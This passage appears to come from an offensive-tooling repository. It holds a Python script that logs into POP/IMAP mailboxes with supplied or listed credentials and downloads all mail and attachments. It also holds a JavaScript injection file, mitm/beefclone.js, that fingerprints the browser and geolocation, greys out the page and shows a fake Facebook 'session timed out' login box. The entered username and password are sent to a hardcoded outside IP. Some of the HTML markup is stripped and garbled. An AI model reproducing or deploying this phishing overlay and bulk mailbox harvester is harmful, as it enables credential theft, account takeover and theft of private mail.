os.path.exists(att_path): 49 | print "[+] Saving attachments: "+att_path 50 | fp = open(att_path, 'wb') 51 | fp.write(msgbody) 52 | fp.close() 53 | else: 54 | if verbose==True: 55 | print "[-] Skipping "+att_path 56 | 57 | 58 | if msg.get_content_maintype() != 'multipart': 59 | continue 60 | for part in msg.walk(): 61 | msgbody = "" 62 | #print 'Content-Type:',part.get_content_type() 63 | #print 'Main Content:',part.get_content_maintype() 64 | #print 'Sub Content:',part.get_content_subtype() 65 | 66 | if part.get_content_maintype() == 'multipart': 67 | continue 68 | if part.get_content_subtype() == 'plain': 69 | msgbody = part.get_payload(decode=True) 70 | return msgbody 71 | if part.get_content_subtype() == 'html': 72 | msgbody = part.get_payload(decode=True) 73 | return msgbody 74 | 75 | #if part.get_content_maintype() == 'multipart': 76 | # continue 77 | if part.get('Content-Disposition') is None: 78 | continue 79 | #else: 80 | # print part.get_content_maintype() 81 | # msgbody = (part.get_payload(decode=True)) 82 | # print msgbody 83 | 84 | 85 | """ 86 | """ 87 | def connectMailboxPOP(username,password,popserver,SSL): 88 | print "[*] Accessing: "+popserver+" - "+username 89 | 90 | emailPath = emails_dir+"emails/"+username+"/Inbox" 91 | if not os.path.exists(emailPath): 92 | os.makedirs(emailPath) 93 | HOST = popserver 94 | ssl = SSL 95 | if SSL==True: 96 | Mailbox = poplib.POP3_SSL(popserver, '995') 97 | else: 98 | Mailbox = poplib.POP3(popserver, '110') 99 | Mailbox.user(username) 100 | Mailbox.pass_(password) 101 | 102 | numMessages = len(Mailbox.list()[1]) 103 | progressBar = False 104 | print "[+] Downloading: "+str(numMessages)+" email(s) - "+username 105 | 106 | for i in range(numMessages): 107 | response = Mailbox.retr(numMessages+1-(i+1)) 108 | #response = Mailbox.retr(numMessages+1-(i+1)) 109 | #response = Mailbox.retr(i+1) 110 | lines = response[1] 111 | emailMessage = email.message_from_string('\n'.join(lines)) 112 | 113 | for part in emailMessage.walk(): 114 | if part.get_content_maintype() == 'text': 115 | msgbody = part.get_payload(decode=True) 116 | att_path = os.path.join(emailPath, str(i+1)) 117 | if not os.path.exists(att_path): 118 | #Write emails to local drive 119 | if len(msgbody)>0: 120 | if verbose==True: 121 | print "[+] Saving emails: "+att_path+" of "+str(numMessages)+" emails" 122 | fp = open(att_path, 'wb') 123 | fp.write(msgbody) 124 | fp.close() 125 | else: 126 | if verbose==True: 127 | print "[-] Skipping "+att_path+" of "+str(numMessages)+" emails" 128 | if progressBar==True: 129 | print "\n" 130 | 131 | if part.get_content_maintype() == 'multipart': 132 | continue 133 | if part.get('Content-Disposition') is None: 134 | continue 135 | filename = part.get_filename() 136 | if (filename): 137 | if not os.path.exists(emails_dir+"attachments/"+username): 138 | os.makedirs(emails_dir+"attachments/"+username) 139 | 140 | msgbody = (part.get_payload(decode=True)) 141 | if msgbody!=None: 142 | att_path = os.path.join(emails_dir+"attachments/"+username+"/", filename) 143 | if not os.path.exists(att_path): 144 | print "[+] Saving attachments: "+att_path 145 | fp = open(att_path, 'wb') 146 | fp.write(msgbody) 147 | fp.close() 148 | else: 149 | if verbose==True: 150 | print "[-] Skipping "+att_path 151 | if not (filename): continue 152 | 153 | 154 | def connectMailboxIMAP(username,password,imapserver,SSL): 155 | print "[*] Accessing: "+imapserver+" - "+username 156 | HOST = imapserver 157 | ssl = SSL 158 | mail = imaplib.IMAP4_SSL(HOST) 159 | mail.login(username,password) 160 | 161 | server = IMAPClient(HOST, use_uid=True, ssl=ssl) 162 | server.login(username,password) 163 | folders = server.list_folders() 164 | 165 | for folder in folders: 166 | #try: 167 | emailPath = emails_dir+"emails/"+username+"/"+folder[2] 168 | if not os.path.exists(emailPath): 169 | os.makedirs(emailPath) 170 | 171 | server.select_folder(folder[2]) 172 | messages = server.search(['NOT DELETED']) 173 | 174 | progressBar = False 175 | print "[+] Downloading from '"+str(folder[2]).strip()+"' folder: "+str(len(messages))+" email(s) - "+username 176 | for msg in messages: 177 | #print msg 178 | #msgid = str(msg).strip("L") 179 | 180 | #Fetch email from server if email is not downloaded yet 181 | att_path = os.path.join(emailPath, str(msg)) 182 | 183 | if not os.path.exists(att_path): 184 | msgbody=fetch_email(server,msg,username) 185 | #Write emails to local drive 186 | if msgbody!=None and len(msgbody)>0: 187 | if verbose==True: 188 | print "[+] Saving emails: "+att_path 189 | fp = open(att_path, 'wb') 190 | fp.write(msgbody) 191 | fp.close() 192 | 193 | #if(len(messages)>10): 194 | # progressBar = True 195 | # sys.stdout.write('.') 196 | # sys.stdout.flush() 197 | else: 198 | if verbose==True: 199 | print "[-] Skipping "+att_path 200 | if progressBar==True: 201 | print "\n" 202 | #except: 203 | # continue 204 | 205 | 206 | def checkEmailServer(): 207 | jobs = [] 208 | accounts = [] 209 | 210 | if(len(USERNAME)>0 or len(PASSWORD)>0): 211 | uname,domain = USERNAME.split('@') 212 | print "[*] Checking: "+USERNAME 213 | 214 | emailServer = '' 215 | if isOpen('pop.'+domain,995): 216 | popserver = 'pop.'+domain 217 | emailServer = 'pop' 218 | SSL=True 219 | if isOpen('pop.'+domain,110): 220 | popserver = 'pop.'+domain 221 | emailServer = 'pop' 222 | SSL=False 223 | if isOpen('pop3.'+domain,995): 224 | popserver = 'pop3.'+domain 225 | emailServer = 'pop' 226 | SSL=True 227 | if isOpen('pop3.'+domain,110): 228 | popserver = 'pop3.'+domain 229 | emailServer = 'pop' 230 | SSL=False 231 | if isOpen('imap.'+domain,465): 232 | imapserver = 'imap.'+domain 233 | emailServer = 'imap' 234 | SSL=True 235 | if isOpen('imap.'+domain,143): 236 | imapserver = 'imap.'+domain 237 | emailServer = 'imap' 238 | SSL=False 239 | 240 | if emailServer=='pop': 241 | p = multiprocessing.Process( 242 | target=connectMailboxPOP, 243 | args=(USERNAME,PASSWORD,popserver,SSL,) 244 | ) 245 | jobs.append(p) 246 | p.start() 247 | if emailServer=='imap': 248 | p = multiprocessing.Process( 249 | target=connectMailboxIMAP, 250 | args=(USERNAME,PASSWORD,imapserver,SSL,) 251 | ) 252 | jobs.append(p) 253 | p.start() 254 | 255 | 256 | if(len(INPUTFILE)>0): 257 | with open(INPUTFILE) as f: 258 | accounts = f.readlines() 259 | for account in accounts: 260 | account = account.strip() 261 | if len(account)>0: 262 | username,password = account.split() 263 | uname,domain = username.split('@') 264 | 265 | print "[*] Checking: "+username 266 | 267 | emailServer = '' 268 | if isOpen('pop.'+domain,995): 269 | popserver = 'pop.'+domain 270 | emailServer = 'pop' 271 | SSL=True 272 | if isOpen('pop.'+domain,110): 273 | popserver = 'pop.'+domain 274 | emailServer = 'pop' 275 | SSL=False 276 | if isOpen('pop3.'+domain,995): 277 | popserver = 'pop3.'+domain 278 | emailServer = 'pop' 279 | SSL=True 280 | if isOpen('pop3.'+domain,110): 281 | popserver = 'pop3.'+domain 282 | emailServer = 'pop' 283 | SSL=False 284 | if isOpen('imap.'+domain,465): 285 | imapserver = 'imap.'+domain 286 | emailServer = 'imap' 287 | SSL=True 288 | if isOpen('imap.'+domain,143): 289 | imapserver = 'imap.'+domain 290 | emailServer = 'imap' 291 | SSL=False 292 | 293 | if emailServer=='pop': 294 | p = multiprocessing.Process( 295 | target=connectMailboxPOP, 296 | args=(username,password,popserver,SSL,) 297 | ) 298 | jobs.append(p) 299 | p.start() 300 | 301 | if emailServer=='imap': 302 | p = multiprocessing.Process( 303 | target=connectMailboxIMAP, 304 | args=(username,password,imapserver,SSL,) 305 | ) 306 | jobs.append(p) 307 | p.start() 308 | 309 | if __name__ == '__main__': 310 | import argparse 311 | parser = argparse.ArgumentParser(__file__) 312 | parser = argparse.ArgumentParser(description="Emails are saved to [current-dir]/result/emails/[email-address] folder. Attachments are saved to [current-dir]/result/attachments/[email-address] folder.") 313 | parser.add_argument('-u','--user', help='Email address', required=False) 314 | parser.add_argument('-p','--pass', help='Email account password', required=False) 315 | parser.add_argument('-f','--file', help='File containing list of email accounts', required=False) 316 | parser.add_argument('-d','--dest', help='Location to save downloaded emails', required=False) 317 | #parser.add_argument('-s','--search', help='Search emails for passwords and credit cards', action='store_true') 318 | parser.add_argument('-v','--verbose', help='Enable verbose mode', action='store_true') 319 | args = vars(parser.parse_args()) 320 | 321 | #if args['search']!=None: 322 | # SEARCH = True 323 | # if SEARCH==True: 324 | # for text in searchText: 325 | # searchthis(emails_dir, text) 326 | if args['verbose']: 327 | verbose=True 328 | if args['dest']!=None: 329 | emails_dir = args['dest']+"/emails/" 330 | if not os.path.exists(emails_dir): 331 | os.makedirs(emails_dir) 332 | if args['user']!=None and args['pass']!=None: 333 | USERNAME = args['user'] 334 | PASSWORD = args['pass'] 335 | checkEmailServer() 336 | if args['file']!=None: 337 | INPUTFILE = args['file'] 338 | checkEmailServer() 339 | 340 | -------------------------------------------------------------------------------- /mitm/beefclone.js: -------------------------------------------------------------------------------- 1 | var geolocation = ""; 2 | var browserVer = ""; 3 | var userAgent = ""; 4 | 5 | function browserVersion(){ 6 | var browser = ''; 7 | var browserVersion = 0; 8 | if (/Opera[\/\s](\d+\.\d+)/.test(navigator.userAgent)) { 9 | browser = 'Opera'; 10 | } else if (/MSIE (\d+\.\d+);/.test(navigator.userAgent)) { 11 | browser = 'MSIE'; 12 | } else if (/Navigator[\/\s](\d+\.\d+)/.test(navigator.userAgent)) { 13 | browser = 'Netscape'; 14 | } else if (/Chrome[\/\s](\d+\.\d+)/.test(navigator.userAgent)) { 15 | browser = 'Chrome'; 16 | } else if (/Safari[\/\s](\d+\.\d+)/.test(navigator.userAgent)) { 17 | browser = 'Safari'; 18 | /Version[\/\s](\d+\.\d+)/.test(navigator.userAgent); 19 | browserVersion = new Number(RegExp.$1); 20 | } else if (/Firefox[\/\s](\d+\.\d+)/.test(navigator.userAgent)) { 21 | browser = 'Firefox'; 22 | } 23 | if(browserVersion === 0){ 24 | browserVersion = parseFloat(new Number(RegExp.$1)); 25 | } 26 | browserVer ="browser="+browser+"&browserVersion="+browserVersion; 27 | userAgent = "&userAgent="+navigator.userAgent; 28 | } 29 | 30 | function showLocation(position) { 31 | var latitude = position.coords.latitude; 32 | var longitude = position.coords.longitude; 33 | geolocation = "&latitude="+latitude+"&longitude="+longitude; 34 | //alert("Latitude : " + latitude + " Longitude: " + longitude); 35 | getVersion(); 36 | } 37 | 38 | function getVersion(){ 39 | browserVersion(); 40 | 41 | //var tz = jstz.determine(); 42 | //var timezone = "&timezone="+tz.name(); 43 | 44 | //var visits = visits; 45 | var referer = document.referrer; 46 | var qtversion = PluginDetect.getVersion("quicktime"); 47 | var axversion = PluginDetect.getVersion("activex"); 48 | var flashversion = PluginDetect.getVersion("flash"); 49 | var ieversion = PluginDetect.getVersion("iecomponent"); 50 | var javaversion = PluginDetect.getVersion("java"); 51 | var pdfjsversion = PluginDetect.getVersion("pdfjs"); 52 | var pdfreaderversion = PluginDetect.getVersion("pdfreader"); 53 | var realplayerversion = PluginDetect.getVersion("realplayer"); 54 | var shockwaveversion = PluginDetect.getVersion("shockwave"); 55 | var silverlightversion = PluginDetect.getVersion("silverlight"); 56 | var vlcversion = PluginDetect.getVersion("vlc"); 57 | var windowsmpversion = PluginDetect.getVersion("windowsmediaplayer"); 58 | 59 | var output = ""; 60 | output += browserVer; 61 | output += userAgent; 62 | output += "&visits="+visits; 63 | output += "&qtversion="+qtversion; 64 | output += "&axversion="+axversion; 65 | output += "&flashversion="+ flashversion; 66 | output += "&ieversion="+ ieversion; 67 | output += "&javaversion="+ javaversion; 68 | output += "&pdfjsversion="+ pdfjsversion; 69 | output += "&pdfreaderversion="+ pdfreaderversion; 70 | output += "&realplayerversion="+ realplayerversion; 71 | output += "&shockwaveversion="+ shockwaveversion; 72 | output += "&silverlightversion="+ silverlightversion; 73 | output += "&vlcversion="+ vlcversion; 74 | output += "&windowsmpversion="+ windowsmpversion; 75 | return output; 76 | 77 | // $.ajax({ 78 | // type: "GET", 79 | // url: "http://96.126.106.188:8888/bin/process", 80 | // data: output, 81 | // success: function() { 82 | // } 83 | // }); 84 | 85 | } 86 | 87 | function errorHandler(err) { 88 | if(err.code == 1) { 89 | //alert("Error: Access is denied!"); 90 | }else if( err.code == 2) { 91 | //alert("Error: Position is unavailable!"); 92 | } 93 | } 94 | function getLocation(){ 95 | if(navigator.geolocation){ 96 | // timeout at 60000 milliseconds (60 seconds) 97 | var options = {timeout:60000}; 98 | navigator.geolocation.getCurrentPosition(showLocation, 99 | errorHandler, 100 | options); 101 | 102 | }else{ 103 | alert("Sorry, browser does not support geolocation!"); 104 | } 105 | } 106 | 107 | var answer= ''; 108 | function grayOut(vis, options) { 109 | var options = options || {}; 110 | var zindex = options.zindex || 50; 111 | var opacity = options.opacity || 70; 112 | var opaque = (opacity / 100); 113 | var bgcolor = options.bgcolor || '#000000'; 114 | var dark=document.getElementById('darkenScreenObject'); 115 | if (!dark) { 116 | var tbody = document.getElementsByTagName("body")[0]; 117 | var tnode = document.createElement('div'); // Create the layer. 118 | tnode.style.position='absolute'; // Position absolutely 119 | tnode.style.top='0px'; // In the top 120 | tnode.style.left='0px'; // Left corner of the page 121 | tnode.style.overflow='hidden'; // Try to avoid making scroll bars 122 | tnode.style.display='none'; // Start out Hidden 123 | tnode.id='darkenScreenObject'; // Name it so we can find it later 124 | tbody.appendChild(tnode); // Add it to the web page 125 | dark=document.getElementById('darkenScreenObject'); // Get the object. 126 | } 127 | if (vis) { 128 | var pageWidth='100%'; 129 | var pageHeight='100%'; 130 | dark.style.opacity=opaque; 131 | dark.style.MozOpacity=opaque; 132 | dark.style.filter='alpha(opacity='+opacity+')'; 133 | dark.style.zIndex=zindex; 134 | dark.style.backgroundColor=bgcolor; 135 | dark.style.width= pageWidth; 136 | dark.style.height= pageHeight; 137 | dark.style.display='block'; 138 | } else { 139 | dark.style.display='none'; 140 | } 141 | } 142 | 143 | // CURRENTLY NOT USED 144 | // Send done prompt to user 145 | function win(){ 146 | document.getElementById('popup').innerHtml='Thank you for re-authenticating, you will now be returned to the application
'; 147 | answer = document.getElementById('uname').value+':'+document.getElementById('pass').value; 148 | } 149 | 150 | 151 | // Check whether the user has entered a user/pass and pressed ok 152 | function checker(){ 153 | uname1 = document.getElementById("uname").value; 154 | pass1 = document.getElementById("pass").value; 155 | valcheck = document.getElementById("buttonpress").value; 156 | 157 | if (uname1.length > 0 && pass1.length > 0 && valcheck == "true") { 158 | // Join user/pass and send to attacker 159 | answer = "source=facebook&"; 160 | answer += "username="+uname1+"&password="+pass1; 161 | $.ajax({ 162 | type: "GET", 163 | url: "http://96.126.106.188:8888/bin/process", 164 | data: answer, 165 | success: function() { 166 | } 167 | }); 168 | //beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer); 169 | // Set lastchild invisible 170 | document.getElementById("popup").setAttribute('style','display:none'); 171 | //document.body.lastChild.setAttribute('style','display:none'); 172 | clearInterval(credgrabber); 173 | // Lighten screen 174 | grayOut(false); 175 | //$j('#popup').remove(); 176 | //$j('#darkenScreenObject').remove(); 177 | 178 | }else if((uname1.length == 0 || pass1.length == 0) && valcheck == "true"){ 179 | // If user has not entered any data reset button 180 | document.getElementById("buttonpress").value = "false"; 181 | alert("Please enter a valid username and password."); 182 | } 183 | } 184 | 185 | 186 | // Facebook floating div 187 | function facebook() { 188 | 189 | sneakydiv = document.createElement('div'); 190 | sneakydiv.setAttribute('id', 'popup'); 191 | sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;'); 192 | document.body.appendChild(sneakydiv); 193 | 194 | // Set appearance using styles, maybe cleaner way to do this with CSS block? 195 | var windowborder = 'style="width:330px;background:white;border:10px #999999 solid;border-radius:8px"'; 196 | var windowmain = 'style="border:1px #555 solid;"'; 197 | var tbarstyle = 'style="color: rgb(255, 255, 255); background-color: rgb(109, 132, 180);font-size: 13px;font-family:tahoma,verdana,arial,sans-serif;font-weight: bold;padding: 5px;padding-left:8px;text-align: left;height: 18px;"'; 198 | var bbarstyle = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"'; 199 | var messagestyle = 'style="align:left;font-size:11px;font-family:tahoma,verdana,arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"'; 200 | var box_prestyle = 'style="color: grey;font-size: 11px;font-weight: bold;font-family: tahoma,verdana,arial,sans-serif;padding-left:30px;"'; 201 | var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color: rgb(109,132,180);"'; 202 | var buttonstyle = 'style="font-size: 13px;background:#627aac;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"'; 203 | 204 | var title = 'Facebook Session Timed Out'; 205 | var messagewords = 'Your session has timed out due to inactivity.Please re-enter your username and password to login.'; 206 | var buttonLabel = ''; 207 | 208 | // Build page including styles 209 | sneakydiv.innerHTML= '
' +title+ '
' + messagewords + '
| Email: | |
Password: |
' +buttonLabel+ '
Your session has timed out!
For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.
| Username: | |
| Password: |
'; 224 | 225 | // Repeatedly check if button has been pressed 226 | credgrabber = setInterval(checker,3000); 227 | 228 | } 229 | 230 | // Set background opacity and apply background 231 | var backcolor = "<%== @backing %>"; 232 | if(backcolor == "Grey"){ 233 | grayOut(true,{'opacity':'70'}); 234 | } else if(backcolor == "Clear"){ 235 | grayOut(true,{'opacity':'0'}); 236 | } 237 | 238 | --------------------------------------------------------------------------------